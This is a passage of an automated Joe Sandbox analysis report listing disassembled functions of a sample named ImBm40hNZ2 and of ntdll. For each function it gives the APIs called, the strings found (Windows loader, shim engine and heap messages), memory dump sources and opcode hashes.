                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                                                                                                                                • API String ID: 0-484625025
                                                                                                                                                                                                                                                                • Opcode ID: 914bb44c4598b368ed9b40273cddf84420b7d88b12389adc9dc14d96b9294fc0
                                                                                                                                                                                                                                                                • Instruction ID: 4d79e83c014845ae4c29f91394e49173cfb8ec8ae82eb090322b7d78f873b130
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 914bb44c4598b368ed9b40273cddf84420b7d88b12389adc9dc14d96b9294fc0
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 825137B1A01309EAEB15AB94DC94FAD73ACEF06394F0404E9E505AB582EB709A41CF61
                                                                                                                                                                                                                                                                Function 3391A170 Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 404COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • Actx , xrefs: 33967819, 33967880
                                                                                                                                                                                                                                                                • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 33967807
                                                                                                                                                                                                                                                                • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 339677E2
                                                                                                                                                                                                                                                                • RtlpFindActivationContextSection_CheckParameters, xrefs: 339677DD, 33967802
                                                                                                                                                                                                                                                                • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 339678F3
                                                                                                                                                                                                                                                                • SsHd, xrefs: 3391A304
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                                                                                                                                                                                                                                • API String ID: 0-1988757188
                                                                                                                                                                                                                                                                • Opcode ID: 012fc69f3045fbc2e4c1db580794e13263b871d84eb161831d3b728098d82941
                                                                                                                                                                                                                                                                • Instruction ID: f6b8081ab50de983a2eaffd5c48a1fba34f22d3f594eb5feeb053dfee31c8e5f
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 012fc69f3045fbc2e4c1db580794e13263b871d84eb161831d3b728098d82941
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BEE1E474E08309CFE715CE68C89071AB7E9BB843A4F540A2DF8A5EB291D731DC55CB81
                                                                                                                                                                                                                                                                Function 3391D690 Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 372timeCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • Actx , xrefs: 33969315
                                                                                                                                                                                                                                                                • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 33969178
                                                                                                                                                                                                                                                                • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 33969153
                                                                                                                                                                                                                                                                • RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 33969372
                                                                                                                                                                                                                                                                • GsHd, xrefs: 3391D794
                                                                                                                                                                                                                                                                • RtlpFindActivationContextSection_CheckParameters, xrefs: 3396914E, 33969173
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                                                • String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                                                                                                                                                                                                                                                • API String ID: 3446177414-2196497285
                                                                                                                                                                                                                                                                • Opcode ID: a7475e96539a95bac44b033e86228e86a20f16dbdcee9fe96fc595347c871a65
                                                                                                                                                                                                                                                                • Instruction ID: bde7626affe76aec7d1e68afcb4ef0bfdae75150ccac863142f71c7c3687e2cd
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a7475e96539a95bac44b033e86228e86a20f16dbdcee9fe96fc595347c871a65
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BFE1B174A05346CFE710CF18C880B5BB7ECBF883A8F544A6DE8959B291D771E854CB92
                                                                                                                                                                                                                                                                Function 00402E62 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 175fileCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00402ECA
                                                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00402F6F
                                                                                                                                                                                                                                                                • MulDiv.KERNEL32(7FFFFFFF,00000064,00000020), ref: 00402F98
                                                                                                                                                                                                                                                                • wsprintfA.USER32 ref: 00402FA8
                                                                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,00000000,?,7FFFFFFF,00000000), ref: 00402FD6
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17207646944.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207575897.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207722697.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207800880.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207879178.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CountTick$FileWritewsprintf
                                                                                                                                                                                                                                                                • String ID: ... %d%%
                                                                                                                                                                                                                                                                • API String ID: 4209647438-2449383134
                                                                                                                                                                                                                                                                • Opcode ID: 1fa3e8c4adcc56b04dfbbc94917ea066f3dcbe6d9c1f3563fcd3960635240e7a
                                                                                                                                                                                                                                                                • Instruction ID: 6a3fda1890073d0766cfbb54329871e7c274013a7bb5ca031e3128d44e3cc29a
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1fa3e8c4adcc56b04dfbbc94917ea066f3dcbe6d9c1f3563fcd3960635240e7a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5F619D7190121A9BCF10DFA5DA44AAE7BBCAF40395F14413BF811B72D4C3789E50DBAA
                                                                                                                                                                                                                                                                Function 338F640D Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 150timeCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • RtlDebugPrintTimes.NTDLL ref: 338F651C
                                                                                                                                                                                                                                                                  • Part of subcall function 338F6565: RtlDebugPrintTimes.NTDLL ref: 338F6614
                                                                                                                                                                                                                                                                  • Part of subcall function 338F6565: RtlDebugPrintTimes.NTDLL ref: 338F665F
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 339597B9
                                                                                                                                                                                                                                                                • apphelp.dll, xrefs: 338F6446
                                                                                                                                                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 339597A0, 339597C9
                                                                                                                                                                                                                                                                • Getting the shim engine exports failed with status 0x%08lx, xrefs: 33959790
                                                                                                                                                                                                                                                                • LdrpInitShimEngine, xrefs: 33959783, 33959796, 339597BF
                                                                                                                                                                                                                                                                • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 3395977C
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                                                • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                                                • API String ID: 3446177414-204845295
                                                                                                                                                                                                                                                                • Opcode ID: 27edda0068ca1b060ebda5b579177de3995359e0e8fb0f92a3db36443db3541a
                                                                                                                                                                                                                                                                • Instruction ID: dc898b3790de9f70426eac8b6aca492955eca4132d3d9bb9e7fbfa0c40df4085
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 27edda0068ca1b060ebda5b579177de3995359e0e8fb0f92a3db36443db3541a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BE51B271A09304DFF310EF68D890A6B77E8EF84744F40091EF5A5AB6A1EB31D944CB92
                                                                                                                                                                                                                                                                Function 3397FA02 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 109timeCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                                                • String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
                                                                                                                                                                                                                                                                • API String ID: 3446177414-4227709934
                                                                                                                                                                                                                                                                • Opcode ID: 15fa4967e382df4dc4e2934bd84c4a908dd3cdfa92feee94c821da82680ac143
                                                                                                                                                                                                                                                                • Instruction ID: 72fc7be0387661fc22faaa4e13e9bed2485d5b52a73f089e600426689956e0e7
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 15fa4967e382df4dc4e2934bd84c4a908dd3cdfa92feee94c821da82680ac143
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 634160B5A01209EFEB05DF99C884ADEBBB9FF48794F140129E925B7380D771AD01CB90
                                                                                                                                                                                                                                                                Function 00403EE6 Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetWindowLongA.USER32(?,000000EB), ref: 00403F03
                                                                                                                                                                                                                                                                • GetSysColor.USER32(00000000), ref: 00403F1F
                                                                                                                                                                                                                                                                • SetTextColor.GDI32(?,00000000), ref: 00403F2B
                                                                                                                                                                                                                                                                • SetBkMode.GDI32(?,?), ref: 00403F37
                                                                                                                                                                                                                                                                • GetSysColor.USER32(?), ref: 00403F4A
                                                                                                                                                                                                                                                                • SetBkColor.GDI32(?,?), ref: 00403F5A
                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 00403F74
                                                                                                                                                                                                                                                                • CreateBrushIndirect.GDI32(?), ref: 00403F7E
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17207646944.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207575897.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207722697.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207800880.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207879178.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2320649405-0
                                                                                                                                                                                                                                                                • Opcode ID: 059a6408e4ff7a7a286042baf0ba0b6777dcdd2840b1e709c5bb58eb991f2f1d
                                                                                                                                                                                                                                                                • Instruction ID: 0203d41d11b8997b99186d389223a7b6b7934b4d059f66b1a69252c0c80ebb8f
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 059a6408e4ff7a7a286042baf0ba0b6777dcdd2840b1e709c5bb58eb991f2f1d
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F6218471904745ABCB219F68DD48B4BBFF8AF01715F048A29EC95E22E1C738EA04CB65
                                                                                                                                                                                                                                                                Function 33909046 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 199timeCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                                                • String ID: $$@$@wv
                                                                                                                                                                                                                                                                • API String ID: 3446177414-2230787357
                                                                                                                                                                                                                                                                • Opcode ID: 684b41141729acb72fa90db5b0f82bce8977dc09786382ea6ea270ab47f99ccb
                                                                                                                                                                                                                                                                • Instruction ID: 3e80fd92ee8fa98ade970558c451c49e15ede2b94da65a6254abb6cd09336af2
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 684b41141729acb72fa90db5b0f82bce8977dc09786382ea6ea270ab47f99ccb
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E3814C71D01269DBDB21CF54CC40BEEB7B8AB48754F0041EAE909BB690D7705E85CFA0
                                                                                                                                                                                                                                                                Function 339AF8F8 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 190timeCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                                                • String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
                                                                                                                                                                                                                                                                • API String ID: 3446177414-3492000579
                                                                                                                                                                                                                                                                • Opcode ID: cc608f9899f0ad7a87ab839d9431015d1d2608b11134753e4a2c45e3893cb7cd
                                                                                                                                                                                                                                                                • Instruction ID: 31f2de6c0151e7d51547806ba5a5c3672fcd543273da083f78861e2dfe9042a5
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cc608f9899f0ad7a87ab839d9431015d1d2608b11134753e4a2c45e3893cb7cd
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F071ED31909645DFDB01DFACD8906A9FBF5FF48340F08825AE496AB752DB319981CB40
                                                                                                                                                                                                                                                                Function 338F6565 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 184timeCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 33959854, 33959895
                                                                                                                                                                                                                                                                • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 33959885
                                                                                                                                                                                                                                                                • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 33959843
                                                                                                                                                                                                                                                                • LdrpLoadShimEngine, xrefs: 3395984A, 3395988B
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                                                • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                                                • API String ID: 3446177414-3589223738
                                                                                                                                                                                                                                                                • Opcode ID: 3517d6b46956eddf644791696fa0d62578a8d95f0afb643d94455986d1c57fed
                                                                                                                                                                                                                                                                • Instruction ID: f01e4651e6710c77b0680b12a028b30d8f3cca207e5ebbbab808b83954252231
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3517d6b46956eddf644791696fa0d62578a8d95f0afb643d94455986d1c57fed
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E7510276E04348DFEB04EFA8C894EAD77EAEB44355F080269E550BF296CB759C41CB80
                                                                                                                                                                                                                                                                Function 3392DA20 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 133timeCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                                                • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
                                                                                                                                                                                                                                                                • API String ID: 3446177414-3224558752
                                                                                                                                                                                                                                                                • Opcode ID: 17480a09f837a58f401d73b15f3c94afe1187ed300522ecb1937ee7b5feba588
                                                                                                                                                                                                                                                                • Instruction ID: e49fd2f499b757efc008729cbef2c23a3f6e8f421cf4741fe01d7b5bd7df87ef
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 17480a09f837a58f401d73b15f3c94afe1187ed300522ecb1937ee7b5feba588
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F1415B35A09B44DFF711DF6CC484B59B7B8EF403A4F148669E46687B81CB749980CB51
                                                                                                                                                                                                                                                                Function 00402683 Relevance: 10.6, APIs: 7, Instructions: 89memoryfileCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 004026D7
                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,000000F0), ref: 004026F3
                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(?), ref: 0040272C
                                                                                                                                                                                                                                                                • WriteFile.KERNEL32(FFFFFD66,00000000,?,FFFFFD66,?,?,?,?,000000F0), ref: 0040273E
                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00402745
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(FFFFFD66,?,?,000000F0), ref: 0040275D
                                                                                                                                                                                                                                                                • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 00402771
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17207646944.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207575897.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207722697.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207800880.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207879178.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3294113728-0
                                                                                                                                                                                                                                                                • Opcode ID: 689b85a215e10f9e2975cf1285ad73087eca50e63662aca7bd35c8278112a5a0
                                                                                                                                                                                                                                                                • Instruction ID: 3852b7668eb2638a640f728426397d6192e80a26e925a200138047876d2d45ee
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 689b85a215e10f9e2975cf1285ad73087eca50e63662aca7bd35c8278112a5a0
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 96317A71C00128BBDF216FA5CD89DAE7E79EF08364F10422AF920762E0D6795D419BA9
                                                                                                                                                                                                                                                                Function 3392DAC0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 84timeCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                                                • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
                                                                                                                                                                                                                                                                • API String ID: 3446177414-1222099010
                                                                                                                                                                                                                                                                • Opcode ID: 7c96588a27a664ad52ce7529459905cd1eb67fc833f4722429b2e9d40cd16fc7
                                                                                                                                                                                                                                                                • Instruction ID: aecb27e3ac25df73249f23ef6d937de4cc060d348ee961541962ebe362e87f52
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7c96588a27a664ad52ce7529459905cd1eb67fc833f4722429b2e9d40cd16fc7
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0631A935606B88DFE322DB68D428B593BECEF013A4F040185F4628BB92CB75ED40CB01
                                                                                                                                                                                                                                                                Function 00404E7C Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(00429000,00000000,?,756A23A0,?,?,?,?,?,?,?,?,?,00402FBC,00000000,?), ref: 00404EB5
                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(00402FBC,00429000,00000000,?,756A23A0,?,?,?,?,?,?,?,?,?,00402FBC,00000000), ref: 00404EC5
                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(00429000,00402FBC,00402FBC,00429000,00000000,?,756A23A0), ref: 00404ED8
                                                                                                                                                                                                                                                                • SetWindowTextA.USER32(00429000,00429000), ref: 00404EEA
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F10
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F2A
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F38
                                                                                                                                                                                                                                                                Memory Dump Source
